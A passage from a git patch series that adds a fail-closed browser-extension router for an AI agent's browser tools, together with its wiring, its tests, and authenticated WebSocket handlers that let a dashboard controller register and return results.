enabled=True, + session_id="session-fixture", + task_id="task-fixture", + tool_call_id="tool-call-fixture", + ) + + assert result == "legacy-result" + assert fallbacks == [True] + assert not any(call[0] == "dispatch" for call in broker.calls) + + +def test_selected_controller_receives_immutable_arguments_and_context(): + broker = FakeBroker( + scope="scope-fixture", + selected="connection-fixture", + result='{"ok": true, "source": "browser-extension"}', + ) + args = {"url": "https://example.test"} + + result = route_browser_tool( + "browser_navigate", + args, + fallback=lambda: pytest.fail("selected controller must not call fallback"), + broker=broker, + enabled=True, + session_id="session-fixture", + task_id="task-fixture", + principal_id="principal-fixture", + transport_family="local-api", + tool_call_id="tool-call-fixture", + ) + + assert result == '{"ok": true, "source": "browser-extension"}' + assert args == {"url": "https://example.test"} + assert broker.calls == [ + ( + "scope", + { + "session_id": "session-fixture", + "task_id": "task-fixture", + "principal_id": "principal-fixture", + "transport_family": "local-api", + }, + ), + ("select", "scope-fixture", "browser_navigate"), + ( + "dispatch", + "scope-fixture", + "browser_navigate", + {"url": "https://example.test"}, + "tool-call-fixture", + ), + ] + + +def test_selected_controller_failure_never_retries_through_existing_backend(): + broker = FakeBroker( + scope="scope-fixture", + selected="connection-fixture", + error=TimeoutError("controller timed out"), + ) + fallbacks = [] + + with pytest.raises(TimeoutError, match="controller timed out"): + route_browser_tool( + "browser_navigate", + {"url": "https://example.test"}, + fallback=lambda: fallbacks.append(True) or "unsafe-retry", + broker=broker, + enabled=True, + session_id="session-fixture", + task_id="task-fixture", + principal_id="principal-fixture", + transport_family="local-api", + tool_call_id="tool-call-fixture", + ) + + assert fallbacks == [] + + +def test_missing_server_bound_identity_falls_back_without_querying_broker(): + broker = FakeBroker(scope="attacker-scope", selected="attacker-controller") + fallbacks = [] + + result = route_browser_tool( + "browser_navigate", + {"url": "https://example.test"}, + fallback=lambda: fallbacks.append(True) or "legacy-result", + broker=broker, + enabled=True, + session_id="session-fixture", + ) + + assert result == "legacy-result" + assert fallbacks == [True] + assert broker.calls == [] + + +def test_routed_handler_reads_server_bound_identity_from_session_context(monkeypatch): + from gateway import browser_control_broker + from gateway.session_context import clear_session_vars, set_session_vars + + broker = FakeBroker( + scope="scope-fixture", + selected="connection-fixture", + result="controller-result", + ) + monkeypatch.setattr(browser_control_broker, "browser_control_enabled", lambda: True) + monkeypatch.setattr( + browser_control_broker, "get_browser_control_broker", lambda: broker + ) + tokens = set_session_vars( + session_id="session-fixture", + browser_control_principal="principal-fixture", + browser_control_transport_family="cloud-ticket-ws", + ) + try: + result = routed_browser_handler( + "browser_navigate", + {"url": "https://example.test"}, + fallback=lambda: pytest.fail("bound controller must be selected"), + tool_call_id="tool-call-fixture", + ) + finally: + clear_session_vars(tokens) + + assert result == "controller-result" + assert broker.calls[0] == ( + "scope", + { + "session_id": "session-fixture", + "task_id": None, + "principal_id": "principal-fixture", + "transport_family": "cloud-ticket-ws", + }, + ) diff --git a/tests/tools/test_browser_extension_router_wiring.py b/tests/tools/test_browser_extension_router_wiring.py new file mode 100644 index 0000000000..0a81b9c567 --- /dev/null +++ b/tests/tools/test_browser_extension_router_wiring.py @@ -0,0 +1,92 @@ +"""Wiring regression tests for the Phase 4 browser extension router. + +These guard the *registry wiring* — that every ``browser_*`` handler routes +through :func:`tools.browser_extension_router.routed_browser_handler` with +the tool's action name, its raw args, and its identity kwargs, instead of +calling the legacy backend directly. The routing contract itself is tested +by ``test_browser_extension_router.py``; here we only pin the plumbing. +""" + +import pytest + +from tools.registry import registry + + +@pytest.fixture(autouse=True) +def _route_spy(monkeypatch): + """Replace the wrapper with a spy that records the route and then runs + the legacy fallback, so each test proves the handler is wired without + exercising real routing or a real browser backend.""" + calls = [] + + def spy(action, args, *, fallback, task_id=None, session_id=None, tool_call_id=None): + calls.append( + { + "action": action, + "args": dict(args), + "task_id": task_id, + "session_id": session_id, + "tool_call_id": tool_call_id, + } + ) + return fallback() + + import tools.browser_tool as browser_tool + import tools.browser_cdp_tool as browser_cdp_tool + + monkeypatch.setattr(browser_tool, "routed_browser_handler", spy) + monkeypatch.setattr(browser_cdp_tool, "routed_browser_handler", spy) + monkeypatch.setattr(browser_tool, "browser_navigate", lambda url="", task_id=None: "legacy-nav") + monkeypatch.setattr(browser_cdp_tool, "browser_cdp", lambda *a, **k: "legacy-cdp") + return calls + + +BROWSER_ACTIONS = [ + "browser_navigate", + "browser_snapshot", + "browser_click", + "browser_type", + "browser_scroll", + "browser_back", + "browser_press", + "browser_get_images", + "browser_vision", + "browser_console", +] + + +def test_every_browser_registry_handler_routes_through_wrapper(_route_spy): + for name in BROWSER_ACTIONS: + _route_spy.clear() + handler = registry.get_entry(name).handler + args = {"url": "https://example.test", "ref": "@e1", "text": "hi"} + result = handler(dict(args), task_id="task-fixture", session_id="session-fixture") + assert result is not None + assert len(_route_spy) == 1, f"{name} did not route through the wrapper" + route = _route_spy[0] + assert route["action"] == name + assert route["task_id"] == "task-fixture" + assert route["session_id"] == "session-fixture" + + +def test_browser_navigate_forwards_raw_args_and_identity(_route_spy): + handler = registry.get_entry("browser_navigate").handler + args = {"url": "https://example.test"} + result = handler(dict(args), task_id="task-fixture", session_id="session-fixture") + assert result == "legacy-nav" + route = _route_spy[0] + assert route["args"] == args + # The router must not mutate the args dict. + assert args == {"url": "https://example.test"} + + +def test_browser_cdp_handler_routes_through_wrapper(_route_spy): + handler = registry.get_entry("browser_cdp").handler + args = {"method": "Target.getTargets", "params": {"filter": []}} + result = handler(dict(args), task_id="task-fixture", session_id="session-fixture") + assert result == "legacy-cdp" + route = _route_spy[0] + assert route["action"] == "browser_cdp" + assert route["args"] == args + assert route["task_id"] == "task-fixture" + assert route["session_id"] == "session-fixture" diff --git a/tools/browser_cdp_tool.py b/tools/browser_cdp_tool.py index eccd8f8fc1..8c23f8a6d7 100644 --- a/tools/browser_cdp_tool.py +++ b/tools/browser_cdp_tool.py @@ -23,6 +23,7 @@ import logging from typing import Any, Dict, Optional from tools.registry import registry, tool_error +from tools.browser_extension_router import routed_browser_handler logger = logging.getLogger(__name__) @@ -671,13 +672,19 @@ registry.register( name="browser_cdp", toolset="browser-cdp", schema=BROWSER_CDP_SCHEMA, - handler=lambda args, **kw: browser_cdp( - method=args.get("method", ""), - params=args.get("params"), - target_id=args.get("target_id"), - frame_id=args.get("frame_id"), - timeout=args.get("timeout", 30.0), + handler=lambda args, **kw: routed_browser_handler( + "browser_cdp", + args, + fallback=lambda: browser_cdp( + method=args.get("method", ""), + params=args.get("params"), + target_id=args.get("target_id"), + frame_id=args.get("frame_id"), + timeout=args.get("timeout", 30.0), + task_id=kw.get("task_id"), + ), task_id=kw.get("task_id"), + session_id=kw.get("session_id"), ), check_fn=_browser_cdp_check, emoji="🧪", diff --git a/tools/browser_extension_router.py b/tools/browser_extension_router.py new file mode 100644 index 0000000000..7a0429e02e --- /dev/null +++ b/tools/browser_extension_router.py @@ -0,0 +1,200 @@ +"""Phase 4 registry-level browser extension router. + +This module is the *agent-side* half of the browser-extension-control +feature: it decides, for one registry ``browser_*`` handler invocation, +whether the command is executed by an attached extension controller (via +the :mod:`gateway.browser_control_broker`) or by the existing legacy +browser backend. + +Routing contract (exercised by ``tests/tools/test_browser_extension_router.py``): + +- **Feature off ⇒ legacy, untouched.** When ``enabled`` is false the broker + is never touched and ``fallback()`` is called exactly once. This is the + default: ``browser.extension_control.enabled`` is false unless explicitly + configured, so every real browser action keeps its exact legacy path. + +- **No exact server-bound scope ⇒ legacy.** ``broker.scope_for_session(...)`` + must return exactly one attached controller scope for the caller's session, + authenticated principal, and transport family. Missing identity, no match, + or ambiguity preserves the existing backend. + +- **No exact capable controller ⇒ legacy.** ``broker.select(scope, action)`` + must return a controller whose capability set contains the action. + Controllers currently register with only ``controller.noop``, so real + browser actions never match and always fall back. + +- **Selected controller ⇒ authoritative.** Once a controller is selected the + command is dispatched to it and its result returned; the legacy backend + is *never* retried, even when the controller fails (timeout, cancellation, + rejection, transport error all propagate to the caller). + +- **Arguments are never mutated.** ``args`` is passed through untouched; + the broker copies arguments into its command frame itself. + +The lazy wrapper :func:`routed_browser_handler` is what the ``browser_*`` +registry handlers call. It resolves the feature flag and the process-local +broker lazily on every invocation so importing this module (or +``tools.browser_tool``) never pulls in the gateway, and so a mid-process +config change is honored without restart. +""" + +from __future__ import annotations + +import logging +from typing import Any, Callable, Dict, Optional + +logger = logging.getLogger(__name__) + + +def route_browser_tool( + action: str, + args: Dict[str, Any], + *, + fallback: Callable[[], Any], + broker: Any, + enabled: bool, + session_id: Optional[str] = None, + task_id: Optional[str] = None, + principal_id: Optional[str] = None, + transport_family: Optional[str] = None, + tool_call_id: Optional[str] = "", +) -> Any: + """Route one browser action through the extension-control broker. + + Parameters + ---------- + action: + Registry tool name / controller capability, e.g. ``"browser_navigate"``. + args: + Tool arguments as received from the model. Never mutated. + fallback: + The existing backend handler, called exactly once when the router + decides the extension path must not run (feature off, no scope, or + no capable controller). Must be a zero-argument callable. + broker: + Object exposing ``scope_for_session(**identity) -> scope|None``, + ``select(scope, capability) -> controller|None`` and + ``dispatch(scope, *, action, arguments, tool_call_id)``. The real + implementation is ``gateway.browser_control_broker``. + enabled: + Feature flag; false bypasses the broker entirely. + session_id/task_id: + Caller session hints forwarded to ``scope_for_session``. + principal_id/transport_family: + Server-bound caller identity. Both are mandatory when the feature is + enabled; missing values fail closed to the existing backend. + tool_call_id: + Caller tool-call id forwarded verbatim to ``dispatch``. + + Returns + ------- + The legacy backend's return value when falling back, or the controller's + completion result when routed. Exceptions from a selected controller are + propagated — the legacy backend is never retried after selection. + """ + if not enabled: + return fallback() + + if not str(principal_id or "").strip() or not str(transport_family or "").strip(): + return fallback() + + scope = broker.scope_for_session( + session_id=session_id, + task_id=task_id, + principal_id=principal_id, + transport_family=transport_family, + ) + if scope is None: + # No unambiguous attached session scope: preserve existing backend. + return fallback() + + controller = broker.select(scope, action) + if controller is None: + # No controller capable of this exact action: preserve existing backend. + return fallback() + + # A controller was selected: it is authoritative. Never retry through the + # existing backend, whatever happens here. + return broker.dispatch( + scope, action=action, arguments=args, tool_call_id=tool_call_id + ) + + +def current_tool_call_id() -> str: + """Return the active tool_call_id, or ``""`` when none is bound. + + The agent executor binds the id via + ``tools.approval.set_current_observability_context`` immediately before + registry dispatch, so the registry handler (and this router) can read it + back from the same context. Bare/offline callers have no binding. + """ + try: + from tools.approval import _approval_tool_call_id + + return _approval_tool_call_id.get() or "" + except Exception: + return "" + + +def routed_browser_handler( + action: str, + args: Dict[str, Any], + *, + fallback: Callable[[], Any], + task_id: Optional[str] = None, + session_id: Optional[str] = None, + principal_id: Optional[str] = None, + transport_family: Optional[str] = None, + tool_call_id: Optional[str] = None, +) -> Any: + """Lazy registry-handler route wrapper for ``browser_*`` tools. + + Resolves the Phase 4 feature flag and process-local broker lazily so the + default (feature off) path costs one cached config read and an immediate + fallback, and so importing ``tools.browser_tool`` never imports the + gateway. When the gateway cannot be imported or the feature is off, the + legacy handler runs unchanged. + """ + try: + from gateway.browser_control_broker import ( + browser_control_enabled, + get_browser_control_broker, + ) + except Exception as exc: # pragma: no cover - defensive, gateway always present + logger.debug( + "browser extension router unavailable (%s); using legacy backend", + exc, + ) + return fallback() + + if not browser_control_enabled(): + return fallback() + + if tool_call_id is None: + tool_call_id = current_tool_call_id() + + try: + from gateway.session_context import get_session_env + + session_id = session_id or get_session_env("HERMES_SESSION_ID", "") or None + principal_id = principal_id or get_session_env( + "HERMES_BROWSER_CONTROL_PRINCIPAL", "" + ) or None + transport_family = transport_family or get_session_env( + "HERMES_BROWSER_CONTROL_TRANSPORT_FAMILY", "" + ) or None + except Exception: + pass + + return route_browser_tool( + action, + args, + fallback=fallback, + broker=get_browser_control_broker(), + enabled=True, + session_id=session_id, + task_id=task_id, + principal_id=principal_id, + transport_family=transport_family, + tool_call_id=tool_call_id, + ) diff --git a/tools/browser_tool.py b/tools/browser_tool.py index 34f38baa1e..3cd08451f3 100644 --- a/tools/browser_tool.py +++ b/tools/browser_tool.py @@ -5390,14 +5390,29 @@ if __name__ == "__main__": # Registry # --------------------------------------------------------------------------- from tools.registry import registry, tool_error +from tools.browser_extension_router import routed_browser_handler _BROWSER_SCHEMA_MAP = {s["name"]: s for s in BROWSER_TOOL_SCHEMAS} + +def _browser_router_kw(kw: dict) -> dict: + """Identity kwargs forwarded to the extension router wrapper.""" + return { + "task_id": kw.get("task_id"), + "session_id": kw.get("session_id"), + } + + registry.register( name="browser_navigate", toolset="browser", schema=_BROWSER_SCHEMA_MAP["browser_navigate"], - handler=lambda args, **kw: browser_navigate(url=args.get("url", ""), task_id=kw.get("task_id")), + handler=lambda args, **kw: routed_browser_handler( + "browser_navigate", + args, + fallback=lambda: browser_navigate(url=args.get("url", ""), task_id=kw.get("task_id")), + **_browser_router_kw(kw), + ), check_fn=check_browser_requirements, emoji="🌐", ) @@ -5405,8 +5420,13 @@ registry.register( name="browser_snapshot", toolset="browser", schema=_BROWSER_SCHEMA_MAP["browser_snapshot"], - handler=lambda args, **kw: browser_snapshot( - full=args.get("full", False), task_id=kw.get("task_id"), user_task=kw.get("user_task")), + handler=lambda args, **kw: routed_browser_handler( + "browser_snapshot", + args, + fallback=lambda: browser_snapshot( + full=args.get("full", False), task_id=kw.get("task_id"), user_task=kw.get("user_task")), + **_browser_router_kw(kw), + ), check_fn=check_browser_requirements, emoji="📸", ) @@ -5414,7 +5434,12 @@ registry.register( name="browser_click", toolset="browser", schema=_BROWSER_SCHEMA_MAP["browser_click"], - handler=lambda args, **kw: browser_click(ref=args.get("ref", ""), task_id=kw.get("task_id")), + handler=lambda args, **kw: routed_browser_handler( + "browser_click", + args, + fallback=lambda: browser_click(ref=args.get("ref", ""), task_id=kw.get("task_id")), + **_browser_router_kw(kw), + ), check_fn=check_browser_requirements, emoji="👆", ) @@ -5422,7 +5447,12 @@ registry.register( name="browser_type", toolset="browser", schema=_BROWSER_SCHEMA_MAP["browser_type"], - handler=lambda args, **kw: browser_type(ref=args.get("ref", ""), text=args.get("text", ""), task_id=kw.get("task_id")), + handler=lambda args, **kw: routed_browser_handler( + "browser_type", + args, + fallback=lambda: browser_type(ref=args.get("ref", ""), text=args.get("text", ""), task_id=kw.get("task_id")), + **_browser_router_kw(kw), + ), check_fn=check_browser_requirements, emoji="⌨️", ) @@ -5430,7 +5460,12 @@ registry.register( name="browser_scroll", toolset="browser", schema=_BROWSER_SCHEMA_MAP["browser_scroll"], - handler=lambda args, **kw: browser_scroll(direction=args.get("direction", "down"), task_id=kw.get("task_id")), + handler=lambda args, **kw: routed_browser_handler( + "browser_scroll", + args, + fallback=lambda: browser_scroll(direction=args.get("direction", "down"), task_id=kw.get("task_id")), + **_browser_router_kw(kw), + ), check_fn=check_browser_requirements, emoji="📜", ) @@ -5438,7 +5473,12 @@ registry.register( name="browser_back", toolset="browser", schema=_BROWSER_SCHEMA_MAP["browser_back"], - handler=lambda args, **kw: browser_back(task_id=kw.get("task_id")), + handler=lambda args, **kw: routed_browser_handler( + "browser_back", + args, + fallback=lambda: browser_back(task_id=kw.get("task_id")), + **_browser_router_kw(kw), + ), check_fn=check_browser_requirements, emoji="◀️", ) @@ -5446,7 +5486,12 @@ registry.register( name="browser_press", toolset="browser", schema=_BROWSER_SCHEMA_MAP["browser_press"], - handler=lambda args, **kw: browser_press(key=args.get("key", ""), task_id=kw.get("task_id")), + handler=lambda args, **kw: routed_browser_handler( + "browser_press", + args, + fallback=lambda: browser_press(key=args.get("key", ""), task_id=kw.get("task_id")), + **_browser_router_kw(kw), + ), check_fn=check_browser_requirements, emoji="⌨️", ) @@ -5455,7 +5500,12 @@ registry.register( name="browser_get_images", toolset="browser", schema=_BROWSER_SCHEMA_MAP["browser_get_images"], - handler=lambda args, **kw: browser_get_images(task_id=kw.get("task_id")), + handler=lambda args, **kw: routed_browser_handler( + "browser_get_images", + args, + fallback=lambda: browser_get_images(task_id=kw.get("task_id")), + **_browser_router_kw(kw), + ), check_fn=check_browser_requirements, emoji="🖼️", ) @@ -5463,7 +5513,12 @@ registry.register( name="browser_vision", toolset="browser", schema=_BROWSER_SCHEMA_MAP["browser_vision"], - handler=lambda args, **kw: browser_vision(question=args.get("question", ""), annotate=args.get("annotate", False), task_id=kw.get("task_id")), + handler=lambda args, **kw: routed_browser_handler( + "browser_vision", + args, + fallback=lambda: browser_vision(question=args.get("question", ""), annotate=args.get("annotate", False), task_id=kw.get("task_id")), + **_browser_router_kw(kw), + ), check_fn=check_browser_vision_requirements, emoji="👁️", ) @@ -5471,7 +5526,12 @@ registry.register( name="browser_console", toolset="browser", schema=_BROWSER_SCHEMA_MAP["browser_console"], - handler=lambda args, **kw: browser_console(clear=args.get("clear", False), expression=args.get("expression"), task_id=kw.get("task_id")), + handler=lambda args, **kw: routed_browser_handler( + "browser_console", + args, + fallback=lambda: browser_console(clear=args.get("clear", False), expression=args.get("expression"), task_id=kw.get("task_id")), + **_browser_router_kw(kw), + ), check_fn=check_browser_requirements, emoji="🖥️", ) diff --git a/tui_gateway/methods_browser_control.py b/tui_gateway/methods_browser_control.py new file mode 100644 index 0000000000..ef0d7240ef --- /dev/null +++ b/tui_gateway/methods_browser_control.py @@ -0,0 +1,308 @@ +"""Browser controller registration / result routing (Phase 4 Cloud). + +The dashboard's browser controller (the extension that physically drives a +browser) registers itself over the authenticated ``/api/ws`` JSON-RPC +gateway. Everything here is bound to the **server-minted identity** that the +dashboard auth layer stamped onto the WS connection: ``hermes_cli.web_server`` +consumes the single-use ticket and records ``ws._hermes_auth_identity``, the +WS transport carries it as ``WSTransport.auth_identity``, and the client can +never name its own principal (a spoofed ``principal_id`` param is ignored and +replaced by a server-derived digest of the authenticated identity). + +Registration attaches the shared transport-neutral broker +(:mod:`gateway.browser_control_broker`) with the calling transport as owner; +broker command/cancel frames are wrapped as standard Gateway ``event`` frames +(``type`` = broker method name, ``payload`` = broker params, plus the owning +``session_id``) so the dashboard consumes the same envelope as every other +gateway event. ``browser.controller.result`` resolves a pending command only +when the request arrives on the same transport that owns the session, and +only for the exact attached scope — the broker's exact-scope ``complete`` is +the last line of defense against cross-tenant completion. + +Phase 4 is deliberately minimal: the only capability a controller may hold is +``controller.noop``, exercised end-to-end by +``tests/gateway/test_browser_control_cloud.py``. + +Note on handler globals: ``HandlerRegistry.install`` (method_ctx.py) rebinds +each handler's ``__globals__`` onto server.py's namespace, so handler bodies +may only reference names server.py defines/imports (``_ok``, ``_err``, +``_sessions``, ``_sessions_lock``, ``current_transport``, ``logger``, ...). +This module's own helpers and constants are therefore captured through +keyword-default arguments, which ``install`` preserves. +""" + +from __future__ import annotations + +import hashlib +import logging + +from .method_ctx import HandlerRegistry + +logger = logging.getLogger(__name__) + +_registry = HandlerRegistry() +method = _registry.method + +#: Capabilities a Cloud/dashboard controller may register in Phase 4. Any +#: capability outside this set is silently filtered out (fail closed: an +#: empty intersection rejects the registration). +_CONTROLLER_CAPABILITIES = frozenset({"controller.noop"}) + +#: Transport family stamped into every scope attached from this gateway. The +#: broker's exact-match contract treats it as an identity field, so an API +#: transport can never address a dashboard controller (and vice versa). +_CLOUD_TRANSPORT_FAMILY = "cloud-ticket-ws" + +#: JSON-RPC error code for identity / session / flag denials (forbidden). +_ERR_FORBIDDEN = 4403 + +#: Identity recorded for server-spawned WS clients (see +#: ``hermes_cli.dashboard_auth.ws_tickets``) — never allowed to act as a +#: browser controller. +_INTERNAL_USER_ID = "server-internal" +_INTERNAL_PROVIDER = "server-internal" + + +def _is_authenticated_identity(identity: object) -> bool: + """True for a server-minted, non-internal ``{user_id, provider}`` identity.""" + if not isinstance(identity, dict): + return False + user_id = identity.get("user_id") + provider = identity.get("provider") + if not isinstance(user_id, str) or not user_id.strip(): + return False + if not isinstance(provider, str) or not provider.strip(): + return False + if user_id == _INTERNAL_USER_ID and provider == _INTERNAL_PROVIDER: + return False + return True + + +def _principal_digest(identity: dict) -> str: + """Server-derived principal id: a digest of the server-minted identity. + + The client-supplied ``principal_id`` RPC param is never trusted; the + digest is deterministic (stable across reconnects for the same user) but + unspoofable by a peer that does not hold the authenticated identity. + """ + raw = f"{identity.get('provider')}\x00{identity.get('user_id')}" + digest = hashlib.sha256(raw.encode("utf-8")).hexdigest() + return f"principal:dashboard:{digest[:32]}" + + +def _broker_event_writer(transport: object, session_id: str): + """Wrap broker command/cancel frames as standard Gateway event frames. + + The broker's send callback receives transport-neutral envelopes like + ``{"method": "browser.controller.command", "params": {...}}``; the + dashboard speaks Gateway events, so we re-envelope them: + ``{"jsonrpc": "2.0", "method": "event", "params": {"type": , + "session_id": , "payload": }}``. + """ + + def send(frame: dict) -> None: + try: + accepted = transport.write( + { + "jsonrpc": "2.0", + "method": "event", + "params": { + "type": frame.get("method"), + "session_id": session_id, + "payload": frame.get("params"), + }, + } + ) + except Exception: + logger.exception( + "browser controller event write failed session=%s frame=%s", + session_id, + frame.get("method"), + ) + raise + if accepted is False: + raise ConnectionError("browser controller event write failed") + + return send + + +@method("browser.controller.register") +def _( + rid, + params: dict, + _family=_CLOUD_TRANSPORT_FAMILY, + _caps=_CONTROLLER_CAPABILITIES, + _forbidden=_ERR_FORBIDDEN, + _identity_ok=_is_authenticated_identity, + _digest=_principal_digest, + _event_writer=_broker_event_writer, +) -> dict: + """Attach this connection as the browser controller for one session. + + Fails closed (4403) unless *every* gate passes: + + * the ``browser.extension_control.enabled`` feature flag is on; + * the calling transport holds a server-authenticated, non-internal + identity (``WSTransport.auth_identity`` — never the RPC params); + * the named session exists in the live session registry and its + ``transport`` is exactly the calling transport; + * at least one requested capability survives the filter to + ``controller.noop``. + + The returned ``scope`` names a server-derived ``principal_id``, the + ``cloud-ticket-ws`` transport family, and the filtered capability set. + """ + from gateway import browser_control_broker + + if not browser_control_broker.browser_control_enabled(): + return _err( + rid, + _forbidden, + "browser.extension_control.enabled is not set", + ) + + transport = current_transport() + identity = getattr(transport, "auth_identity", None) + if not _identity_ok(identity): + return _err( + rid, + _forbidden, + "browser.controller.register requires an authenticated " + "non-internal identity", + ) + + session_id = str(params.get("session_id") or "") + with _sessions_lock: + session = _sessions.get(session_id) + if session is None or session.get("transport") is not transport: + return _err( + rid, + _forbidden, + "session is not owned by this transport", + ) + + controller_id = str(params.get("controller_id") or "").strip() + browser_profile_id = str(params.get("browser_profile_id") or "").strip() + profile_id = str(session.get("profile") or "").strip() + if not controller_id or not browser_profile_id or not profile_id: + return _err( + rid, + _forbidden, + "controller_id, browser_profile_id, and server session profile are required", + ) + + requested = params.get("capabilities") or [] + capabilities = frozenset(cap for cap in requested if cap in _caps) + if not capabilities: + return _err( + rid, + _forbidden, + "no permitted controller capabilities requested", + ) + + scope = browser_control_broker.ControllerScope( + principal_id=_digest(identity), + profile_id=profile_id, + session_id=session_id, + controller_id=controller_id, + browser_profile_id=browser_profile_id, + transport_family=_family, + capabilities=capabilities, + ) + + broker = browser_control_broker.get_browser_control_broker() + broker.attach( + scope, + _event_writer(transport, session_id), + owner=transport, + ) + + return _ok( + rid, + { + "scope": { + "principal_id": scope.principal_id, + "profile_id": scope.profile_id, + "session_id": scope.session_id, + "controller_id": scope.controller_id, + "browser_profile_id": scope.browser_profile_id, + "transport_family": scope.transport_family, + "capabilities": sorted(scope.capabilities), + } + }, + ) + + +@method("browser.controller.result") +def _( + rid, + params: dict, + _family=_CLOUD_TRANSPORT_FAMILY, + _forbidden=_ERR_FORBIDDEN, + _identity_ok=_is_authenticated_identity, + _digest=_principal_digest, +) -> dict: + """Deliver one controller command result back to the broker. + + Only the transport that owns the session may resolve its commands, and + only against the exact scope attached for that session (the broker's + exact-scope ``complete`` rejects any other scope). ``accepted`` is + ``False`` for unknown / already-resolved / cancelled command ids — the + broker's idempotent answer, surfaced verbatim. + """ + from gateway import browser_control_broker + + transport = current_transport() + identity = getattr(transport, "auth_identity", None) + if not _identity_ok(identity): + return _err(rid, _forbidden, "authenticated controller identity required") + session_id = str(params.get("session_id") or "") + with _sessions_lock: + session = _sessions.get(session_id) + if session is None or session.get("transport") is not transport: + return _err( + rid, + _forbidden, + "session is not owned by this transport", + ) + + command_id = str(params.get("command_id") or "") + if not command_id: + return _err(rid, _forbidden, "command_id required") + + broker = browser_control_broker.get_browser_control_broker() + scope = broker.scope_for_session( + session_id=session_id, + principal_id=_digest(identity), + transport_family=_family, + ) + if scope is None: + return _err( + rid, + _forbidden, + "no controller registered for this session", + ) + # Defense in depth: the exact-scope complete below already rejects any + # foreign scope, but the owner check makes the "same transport" rule + # explicit at this layer too. + controller = broker.select(scope, "controller.noop") + if controller is None or controller.owner is not transport: + return _err( + rid, + _forbidden, + "controller is not owned by this transport", + ) + + ok = params.get("ok") is True + accepted = broker.complete( + command_id, + scope=scope, + ok=ok, + result=params.get("result") if ok else params.get("error"), + ) + return _ok(rid, {"accepted": accepted}) + + +def register(server) -> None: + """Bind this module's handlers onto ``server``'s globals and registry.""" + _registry.install(server) diff --git a/tui_gateway/server.py b/tui_gateway/server.py index 5b6a177569..ff08824ea3 100644 --- a/tui_gateway/server.py +++ b/tui_gateway/server.py @@ -3433,6 +3433,8 @@ def _set_session_context( # it instead of falling back to the gateway launch dir. resolved = cwd if cwd is not None else _cwd_for_session_key(session_key) source = _resolve_session_platform() + browser_control_principal = "" + browser_control_transport_family = "" # Derive the live conversation id so terminal/execute_code subprocesses # can read HERMES_SESSION_ID. Without this, set_session_vars leaves the # session-id contextvar as "" (explicitly empty), and the subprocess-env @@ -3450,11 +3452,22 @@ def _set_session_context( session_id = ( getattr(sess.get("agent"), "session_id", None) or session_key ) + transport = sess.get("transport") + identity = getattr(transport, "auth_identity", None) + if _methods_browser_control._is_authenticated_identity(identity): + browser_control_principal = ( + _methods_browser_control._principal_digest(identity) + ) + browser_control_transport_family = ( + _methods_browser_control._CLOUD_TRANSPORT_FAMILY + ) break return set_session_vars( session_key=session_key, session_id=session_id, source=source, + browser_control_principal=browser_control_principal, + browser_control_transport_family=browser_control_transport_family, cwd=resolved, ui_session_id=ui_session_id, cron_session="", @@ -15621,6 +15634,7 @@ def _mcp_summarize_server(name, cfg): # noqa: E402 # Imported at the end of this module so every global the handlers close # over already exists; register() rebinds them onto this namespace. from . import ( # noqa: E402 + methods_browser_control as _methods_browser_control, methods_complete as _methods_complete, methods_config as _methods_config, methods_images as _methods_images, @@ -15631,6 +15645,7 @@ from . import ( # noqa: E402 ) for _m in ( + _methods_browser_control, _methods_session, _methods_prompt, _methods_config, diff --git a/tui_gateway/ws.py b/tui_gateway/ws.py index 073c4ac149..1f2c7b0316 100644 --- a/tui_gateway/ws.py +++ b/tui_gateway/ws.py @@ -89,10 +89,19 @@ class WSTransport: loop: asyncio.AbstractEventLoop, *, peer: str = "unknown", + auth_identity: dict | None = None, ) -> None: self._ws = ws self._loop = loop self._peer = peer + #: Server-verified identity carried from the WS-upgrade credential + #: (dashboard ticket / internal credential) — stamped by + #: ``hermes_cli.web_server._ws_auth_reason`` onto the WS object and + #: passed through ``handle_ws``. None for transports that + #: authenticated via the legacy token path or stdio. RPC params can + #: never populate this: it is the only identity authority for + #: browser-controller registration. + self.auth_identity = auth_identity self._closed = False # Token-coalescing buffer (CF-2). Streamed token frames land here and a # short timer flushes the batch. The lock guards the buffer + the @@ -283,8 +292,16 @@ def _disable_nagle(ws: Any) -> None: _log.debug("ws TCP_NODELAY skip: %s", exc) -async def handle_ws(ws: Any) -> None: - """Run one WebSocket session. Wire-compatible with ``tui_gateway.entry``.""" +async def handle_ws(ws: Any, *, auth_identity: dict | None = None) -> None: + """Run one WebSocket session. Wire-compatible with ``tui_gateway.entry``. + + *auth_identity* is the server-minted ``{user_id, provider}`` recorded at + WS-upgrade authentication (``hermes_cli.web_server._ws_auth_reason``); it + is stored on the transport as ``WSTransport.auth_identity`` and is the + only identity authority for browser-controller registration. Existing + callers (stdio-free harnesses, the embedded TUI child) omit it and get a + ``None`` transport identity — unchanged behaviour. + """ peer = _ws_peer_label(ws) transport: WSTransport | None = None messages = 0 @@ -301,7 +318,12 @@ async def handle_ws(ws: Any) -> None: _disable_nagle(ws) _log.info("ws accepted peer=%s", peer) - transport = WSTransport(ws, asyncio.get_running_loop(), peer=peer) + transport = WSTransport( + ws, + asyncio.get_running_loop(), + peer=peer, + auth_identity=auth_identity, + ) # resolve_skin() reads config + initializes the skin engine — # synchronous I/O + CPU work that should not block the event loop @@ -431,6 +453,22 @@ async def handle_ws(ws: Any) -> None: detached_sessions = 0 if transport is not None: server.unregister_live_transport(transport) + + # Owner-safely detach browser controllers this transport + # registered (Phase 4 Cloud). The socket itself is closing, so no + # peer cancel write is attempted; every server-side pending command + # is still failed closed immediately. + try: + from gateway.browser_control_broker import ( + get_browser_control_broker, + ) + + get_browser_control_broker().detach_owner( + transport, notify_controller=False + ) + except Exception: + _log.exception("ws browser-controller detach failed peer=%s", peer) + transport.close() try: From c9fd5223f62317796b1a7c260bb1e8a1a22c348a Mon Sep 17 00:00:00 2001 From: abundantbeing Date: Thu, 13 Aug 2026 00:22:07 +0700 Subject: [PATCH 010/161] feat(browser): enable extension controller actions --- gateway/platforms/api_server.py | 48 +++++++++---- hermes_cli/web_server.py | 37 +++++++++- tests/gateway/test_browser_control_api.py | 71 ++++++++++++++++--- tests/gateway/test_browser_control_cloud.py | 50 +++++++++++++ .../hermes_cli/test_dashboard_auth_ws_auth.py | 48 ++++++++++++- tui_gateway/methods_browser_control.py | 36 ++++++++++ tui_gateway/ws.py | 12 +++- 7 files changed, 274 insertions(+), 28 deletions(-) diff --git a/gateway/platforms/api_server.py b/gateway/platforms/api_server.py index 33efd02172..127fafd6b5 100644 --- a/gateway/platforms/api_server.py +++ b/gateway/platforms/api_server.py @@ -80,10 +80,21 @@ _api_request_browser_control_transport_family: ContextVar[str] = ContextVar( 